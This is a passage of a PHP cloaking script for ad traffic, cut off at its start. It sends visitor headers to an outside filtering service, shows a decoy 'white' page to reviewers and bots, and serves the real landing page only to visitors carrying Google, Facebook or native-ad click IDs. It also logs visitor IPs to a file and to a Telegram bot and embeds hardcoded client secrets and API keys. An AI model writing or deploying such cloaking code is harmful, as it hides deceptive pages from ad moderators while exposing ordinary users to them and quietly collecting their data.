$max_length) { $chunks[] = $current_chunk; $current_chunk = ""; } $current_chunk .= $line . "\n"; } if (!empty($current_chunk)) { $chunks[] = $current_chunk; } foreach ($chunks as $chunk) { $ch = curl_init(); curl_setopt_array( $ch, array( CURLOPT_URL => 'https://api.telegram.org/bot' . TELEGRAM_TOKEN . '/sendMessage', CURLOPT_POST => TRUE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_TIMEOUT => 10, CURLOPT_POSTFIELDS => array( 'chat_id' => TELEGRAM_CHATID, 'text' => $chunk, 'parse_mode' => 'HTML' ), ) ); curl_exec($ch); } } $request_ip = $_SERVER["HTTP_CF_CONNECTING_IP"] ? $_SERVER["HTTP_CF_CONNECTING_IP"] : ( $_SERVER["HTTP_X_FORWARDED_FOR"] ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"] ); function getCountryByIp() { global $request_ip; $curl = curl_init('https://pro.ip-api.com/json/' . $request_ip . '?key=0YoFQAK1tdsBe1Y'); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_HEADER, false); $response = json_decode(curl_exec($curl), true); curl_close($curl); return strtolower($response['countryCode']); } function logClick($type, $etc) { global $request_ip; $logFile = 'assets/php/log.json'; $timestamp = date('Y-m-d H:i:s'); $ip = $request_ip; $country = getCountryByIp(); $clickData = [ 'timestamp' => $timestamp, 'country' => $country, 'ip' => $ip, 'type' => $type, 'check' => $etc, 'utms' => http_build_query($_GET), 'referer' => $_SERVER['HTTP_REFERER'] ]; $existingData = []; if (file_exists($logFile)) { $jsonContent = file_get_contents($logFile); if ($jsonContent) { $existingData = json_decode($jsonContent, true); } } $existingData[] = $clickData; file_put_contents($logFile, json_encode($existingData, JSON_PRETTY_PRINT)); } function countClicksByIpForToday($ip) { $logFile = 'assets/php/log.json'; if (file_exists($logFile)) { $clickCount = 0; $jsonContent = file_get_contents($logFile); $existingData = json_decode($jsonContent, true); $currentTime = time(); $oneDayAgo = $currentTime - 86400; foreach ($existingData as $entry) { $clickTime = strtotime($entry['timestamp']); if ($entry['ip'] === $ip && $clickTime >= $oneDayAgo) { $clickCount++; } } return $clickCount; } } if (countClicksByIpForToday($request_ip) >= 10) { $logFile = 'assets/php/log.json'; $jsonContent = file_get_contents($logFile); $existingData = json_decode($jsonContent, true); foreach ($existingData as $entry) { if ($entry['ip'] === $request_ip) { $type = $entry['type']; } } if ($type != 'frod') { $current_domain = getcwd(); $current_domain = str_replace("/var/www/www-root/data/www/", "",$current_domain); if ($current_domain === $_SERVER['SERVER_NAME']) { $is_bot = ''; } else { $is_bot = " BOT: {$_SERVER['SERVER_NAME']}"; } $message = "⚠️ FROD: {$current_domain} IP: ".$request_ip.$is_bot; message_to_telegram("{$message}"); $data = [ 'timestamp' => date('Y-m-d H:i:s'), 'domain' => $current_domain, 'ip' => $request_ip ]; $target_url = 'https://true-vista.com/dev/statuses/frod.php'; $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => $target_url, CURLOPT_POST => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_POSTFIELDS => http_build_query($data) ]); $response = curl_exec($ch); curl_close($ch); } logClick('frod', 'frod'); exit; } header('Access-Control-Allow-Origin: *'); $isTarget = (new RequestHandlerClient())->run(); class RequestHandlerClient { const SERVER_URL = 'https://rbl.palladium.expert'; /** * @param int $clientId * @param string $company * @param string $secret * * @return void * @throws \Exception */ public function run() { if (!empty($_GET) && isset($_GET['dr_jsess']) && $_GET['dr_jsess'] == 1) { header("HTTP/1.1 200 OK"); return; } $headers = []; $headers['request'] = $this->collectRequestData(); $headers['jsrequest'] = $this->collectJsRequestData(); $headers['server'] = $this->collectHeaders(); if (empty($_GET['ckey'])) { $jsonFile = 'assets/php/utms.json'; if (file_exists($jsonFile)) { $jsonString = file_get_contents($jsonFile); $data = json_decode($jsonString, true); $utmParams = $data['UTMS'][0]; $queryString = ''; foreach ($utmParams as $key => $value) { $queryString .= $key . '=' . urlencode($value) . '&'; $_GET[$key] = urlencode($value); } $_GET['from'] = 'json'; $queryString = rtrim($queryString, '&'); $headers['server']['QUERY_STRING'] = $queryString; } } if (in_array($_GET['sub3'], ['ID58', 'ID59', 'ID10', 'ID65']) && $_GET['sub5'] === 'empty') { $headers['server']['HTTP_HOST'] = 'everglloww.com'; $headers['auth']['clientId'] = 3767; $headers['auth']['clientCompany'] = "5ZPhXri3nq7ufmt64w4x"; $headers['auth']['clientSecret'] = "Mzc2NzVaUGhYcmkzbnE3dWZtdDY0dzR4Y2U2NmY2ZTZmOWRlZjUxMGFjNDBiYTJlNjVjMmFjZGEwMTQyZmZhZQ=="; $headers['server']['bannerSource'] = 'adwords'; } else { $headers['server']['HTTP_HOST'] = 'visioncodexup.com'; $headers['auth']['clientId'] = 3767; $headers['auth']['clientCompany'] = "uiDWQ8ffn8nYkFQcYLhi"; $headers['auth']['clientSecret'] = "Mzc2N3VpRFdROGZmbjhuWWtGUWNZTGhpY2U2NmY2ZTZmOWRlZjUxMGFjNDBiYTJlNjVjMmFjZGEwMTQyZmZhZQ=="; $headers['server']['bannerSource'] = 'adwords'; } return $this->curlSend($headers); } /** * @param array $params * * @return bool * @throws \Exception */ public function curlSend(array $params) { $answer = false; $curl = curl_init(self::SERVER_URL); if ($curl) { curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($params)); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 3); curl_setopt($curl, CURLOPT_TIMEOUT, 4); curl_setopt($curl, CURLOPT_TIMEOUT_MS, 4000); curl_setopt($curl, CURLOPT_FORBID_REUSE, true); $result = curl_exec($curl); if ($result) { $serverOut = json_decode( $result, true ); $status = curl_getinfo($curl, CURLINFO_HTTP_CODE); if ($status == 200 && is_array($serverOut)) { $answer = $this->handleServerReply($serverOut); return $answer; } } } $this->getDefaultAnswer(); return $answer; } protected function handleServerReply($reply) { $result = (bool) ($reply['result'] ? $reply['result'] : 0); if ( isset($reply['mode']) && ( (isset($reply['target'])) || (isset($reply['content']) && !empty($reply['content'])) ) ) { $target = $reply['target']; $mode = $reply['mode']; $content = $reply['content']; if (preg_match('/^https?:/i', $target) && $mode == 3) { // do fallback to mode2 $mode = 2; } if (!empty($_GET) && isset($_GET['landing']) && $_GET['landing'] != '') { $result = 1; $target = parse_url($target); if (isset($target['query'])) { parse_str($target['query'], $_GET); } $target['path'] = 'page.php'; require_once $this->sanitizePath($target['path']); exit; } if ($result && $mode == 1) { $this->displayIFrame($target); exit; } elseif ($result && $mode == 2) { header("Location: {$target}"); exit; } elseif ($result && $mode == 3) { $target = parse_url($target); if (isset($target['query'])) { parse_str($target['query'], $_GET); } $this->hideFormNotification(); if ($target['path'] === 'page.php') { if ( isset($_GET['gclid']) || isset($_GET['wbraid']) || isset($_GET['gbraid']) || isset($_GET['fbclid']) || ( isset($_GET['native']) && isset($_SERVER['HTTP_REFERER']) && parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) === 'clck.mgid.com' ) || ( isset($_GET['native']) && $_GET['native'] === 'geozo' ) ) { logClick('redirect', 'valid'); require_once $this->sanitizePath($target['path']); exit; } else { logClick('white', 'no_clid'); $target['path'] = 'main.php'; require_once $this->sanitizePath($target['path']); exit; } } else { logClick('white', 'invalid'); require_once $this->sanitizePath($target['path']); exit; } } elseif ($result && $mode == 4) { echo $content; exit; } else if (!$result && $mode == 5) { // } elseif ($mode == 6) { // } else { logClick('white', 'proxy_vpn'); $path = $this->sanitizePath($target); if (!$this->isLocal($path)) { header("404 Not Found", true, 404); } else { $this->hideFormNotification(); require_once $path; } exit; } } return $result; } private function hideFormNotification() { echo ""; //echo ""; } private function displayIFrame($target) { $target = htmlspecialchars($target); echo " " . $this->hideFormNotification() . " "; } private function sanitizePath($path) { if ($path[0] !== '/') { $path = __DIR__ . '/' . $path; } else { $path = __DIR__ . $path; } return $path; } private function isLocal($path) { // do not validate url via filter_var $url = parse_url($path); if (!isset($url['scheme']) || !isset($url['host'])) { return true; } else { return false; } } /** * Get all HTTP server headers and few additional ones * * @return mixed */ protected function collectHeaders() { $userParams = [ 'REMOTE_ADDR', 'SERVER_PROTOCOL', 'SERVER_PORT', 'REMOTE_PORT', 'QUERY_STRING', 'REQUEST_SCHEME', 'REQUEST_URI', 'REQUEST_TIME_FLOAT', 'X_FB_HTTP_ENGINE', 'X_PURPOSE', 'X_FORWARDED_FOR', 'X_WAP_PROFILE', 'X-Forwarded-Host', 'X-Forwarded-For', 'X-Frame-Options', ]; $headers = []; foreach ($_SERVER as $key => $value) { if (in_array($key, $userParams) || substr_compare('HTTP', $key, 0, 4) == 0) { $headers[$key] = $value; } } return $headers; } private function collectRequestData(): array { $data = []; if (!empty($_POST)) { if (!empty($_POST['data'])) { $data = json_decode($_POST['data'], true); if (JSON_ERROR_NONE !== json_last_error()) { $data = json_decode( stripslashes($_POST['data']), true ); } unset($_REQUEST['data']); } if (!empty($_POST['crossref_sessionid'])) { $data['cr-session-id'] = $_POST['crossref_sessionid']; unset($_POST['crossref_sessionid']); } } return $data; } public function collectJsRequestData(): array { $data = []; if (!empty($_POST)) { if (!empty($_POST['jsdata'])) { $data = json_decode($_POST['jsdata'], true); if (JSON_ERROR_NONE !== json_last_error()) { $data = json_decode( stripslashes($_POST['jsdata']), true ); } unset($_REQUEST['jsdata']); } } return $data; } /** * Default answer for the curl request in case of fault * * @return bool */ private function getDefaultAnswer() { header($_SERVER["SERVER_PROTOCOL"] . ' 500 Internal Server Error', true, 500); echo "

500 Internal Server Error

The request was unsuccessful due to an unexpected condition encountered by the server.

"; exit; } }